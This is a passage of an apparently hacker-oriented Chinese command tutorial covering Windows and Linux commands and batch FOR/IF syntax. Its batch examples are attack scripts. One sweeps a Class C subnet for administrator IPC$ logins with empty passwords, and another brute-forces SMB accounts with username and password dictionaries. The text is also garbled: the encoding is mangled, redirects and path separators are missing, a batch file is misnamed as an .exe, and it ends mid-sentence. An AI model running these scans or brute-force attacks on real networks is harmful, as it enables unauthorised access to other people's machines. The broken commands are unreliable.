47、hool.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發(fā)現(xiàn)。 win2003系統(tǒng)下新增命令（實用部份）： shutdown /參數(shù) 關(guān)閉或重啟本地或遠程主機。參數(shù)說明：/S 關(guān)閉主機，/R 重啟主機， /T 數(shù)字 設(shè)定延時的時間，范圍0180秒之間， /A取消開機，/M /IP 指定的遠程主機。例：shutdown /r /t 0 立即重啟本地主機（無延時） taskill /參數(shù) 進程名或進程的pid 終止一個或多個任務(wù)和進程。參數(shù)說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，

48、/T 終止指定的進程及他所啟動的子進程。 tasklist 顯示當前運行在本地和遠程主機上的進程、服務(wù)、服務(wù)各進程的進程標識符(PID)。參數(shù)說明：/M 列出當前進程加載的dll文件，/SVC 顯示出每個進程對應(yīng)的服務(wù)，無參數(shù)時就只列出當前的進程。Linux系統(tǒng)下基本命令： 要區(qū)分大小寫 uname 顯示版本信息（同win2K的 ver） dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir） pwd 查詢當前所在的目錄位置 cd cd .回到上一層目錄，注意cd 與.之間有空格。cd /返回到根目錄。 cat 文件名 查看文件內(nèi)容 cat abc.txt 往abc

49、.txt文件中寫上內(nèi)容。 more 文件名 以一頁一頁的方式顯示一個文本文件。 cp 復(fù)制文件 mv 移動文件 rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄 mkdir 目錄名 建立目錄 rmdir 刪除子目錄，目錄內(nèi)沒有文檔。 chmod 設(shè)定檔案或目錄的存取權(quán)限 grep 在檔案中查找字符串 diff 檔案文件比較 find 檔案搜尋 date 現(xiàn)在的日期、時間 who 查詢目前和你使用同一臺機器的人以及Login時間地點 w 查詢目前上機者的詳細資料 whoami 查看自己的帳號名稱 groups 查看某人的Group passwd 更改密碼 history 查看自己下過的

50、命令 ps 顯示進程狀態(tài) kill 停止某進程 gcc 黑客通常用它來編譯C語言寫的文件 su 權(quán)限轉(zhuǎn)換為指定使用者 telnet IP telnet連接對方主機（同win2K），當出現(xiàn)bash$時就說明連接成功。 ftp ftp連接上某服務(wù)器（同win2K） 附：批處理命令與變量1：for命令及變量 基本格式： FOR /參數(shù) %variable IN (set) DO command command_parameters %variable:指定一個單一字母可替換的參數(shù)，如：%i ，而指定一個變量則用：%i ，而調(diào)用變量時用：%i% ，變量是區(qū)分大小寫的（%i 不等于 %I）。批處理每次能

51、處理的變量從%0%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2%9指輸入的第2-9個值；例：net use ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3(set):指定一個或一組文件，可使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254),“(1 1 254)”第一個1指起始值，第二個1指增長量，第三個254指結(jié)束值，即：從1到254；“(1 -1 254)”說明：即從254到1command：指定對第個文件執(zhí)行的命令，如：net use命令；如要執(zhí)行多個命令時，命令

52、這間加：& 來隔開command_parameters：為特定命令指定參數(shù)或命令行開關(guān)IN (set)：指在(set)中取值；DO command ：指執(zhí)行command參數(shù)：/L 指用增量形式(set)為增量形式時；/F 指從文件中不斷取值，直到取完為止(set)為文件時，如(d:pass.txt)時。 用法舉例： echo off echo 用法格式：test.bat *.*.* test.txt for /L %G in (1 1 254) do echo %1.%G test.txt & net use %1.%G /user:administrator | find 命令成功完成 t

53、est.txt 存為test.bat 說明：對指定的一個C類網(wǎng)段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%G 為變量(ip的最后一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$后，在結(jié)果中用find查看是否有命令成功完成信息；%1.%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結(jié)止值。 echo off echo 用法格式：ok.bat ip FOR /F %i IN (D

54、:user.dic) DO smb.exe %1 %i D:pass.dic 200 存為：ok.exe 說明：輸入一個IP后，用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼，直到文件中值取完為止。%i為用戶名；%1為輸入的IP地址（默認）。2：if命令及變量 基本格式： IF not errorlevel 數(shù)字 命令語句 如果程序運行最后返回一個等于或大于指定數(shù)字的退出編碼，指定條件為“真”。例：IF errorlevel 0 命令 指程序執(zhí)行后返回的值為0時，就值行后面的命令；IF not errorlevel 1 命令指程序執(zhí)行最后返回的值不等于1，就執(zhí)行后面的命令。0 指發(fā)現(xiàn)并成功執(zhí)行（真）；1 指沒有發(fā)現(xiàn)、沒執(zhí)行（假）。 IF not 字符串1=字符串2 命令語句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就執(zhí)行后面的命令。例：“if %2%=4 goto start”指：如果輸入的第二個變量為4時，執(zhí)行后面的命令（注意：調(diào)用變量時就%變量名%并加 ） IF not exist 文件名 命令語句 如果指定的文件名存在，就執(zhí)行后面的命令。例：“if not nc.exe goto end”指：如果沒有發(fā)現(xiàn)nc.exe文件就跳到:end標簽處。 IF not errorlevel 數(shù)字 命